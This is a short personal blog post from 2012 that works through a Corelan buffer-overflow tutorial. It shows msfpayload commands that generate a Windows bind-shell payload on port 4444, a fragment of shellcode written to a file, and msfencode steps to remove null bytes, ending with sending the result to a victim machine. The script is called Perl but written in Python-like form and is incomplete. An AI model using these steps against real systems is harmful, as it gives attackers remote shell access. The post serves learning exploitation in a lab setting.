Saturday, November 10, 2012

Buffer Overflow - Some thoughts

In this post I'll talk about Buffer Overflow Exploitation in Windows.

Have in mind that this is not intentioned to make you learn, or anything like that, this blog is for personal use, and will contain info that I don't wanna lose or forget. Anyway, I share with everyone, so that it can be helpful for other people.

I learn about buffer overflow from the below link, one of the many tutorials of corelan team:

That is an extremely good tutorial, one that you actually can follow, and understand, and specially one that you can test yourself.

At the end of the tutorial, you have a type of challenge, where you should be able to make your shellcode to be able to get a telnet connection on the remote computer, getting that shellcode to insert on the exploit is the challenge part.

The way I found to do it was:

Get the payload from the msfpayload:

msfpayload windows/shell_bind_tcp

That will create the shell code of a telnet connection with an open port at 4444(default)

Now, if you test it, it will not work, because it have probably null's and bad chars not supported on the RMtoMP3 application, so we have to use and encoder.

Here come's the trick:

Step 1

Imagine this is the shell code(this is just and example):


what you have to do, is create a scrip, that write the shell code in a binary file.
For this example, I will use perl as script language:


shell = ("\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b")
file = open('shellcode.bin','w')

Step 2

After running the script you will have a shellcode.bin file. So now, is time to use our encoder:

msfencode -e x86/alpha_upper -b '\x00' -i Desktop/shellcode.bin -t c

 -e ... -> is the type of encoder you wanna use. you can get a list of then using msfencode -l

-b ... -> is the characters you want to avoid, in this case the null

-i ... -> is the file you want to encode


-t ... -> is the output file format

With this all set, you just now have the correct shell code, and now just need to add it to your own exploit.

Send it to the victim machine and Voilá!!!

No comments:

Post a Comment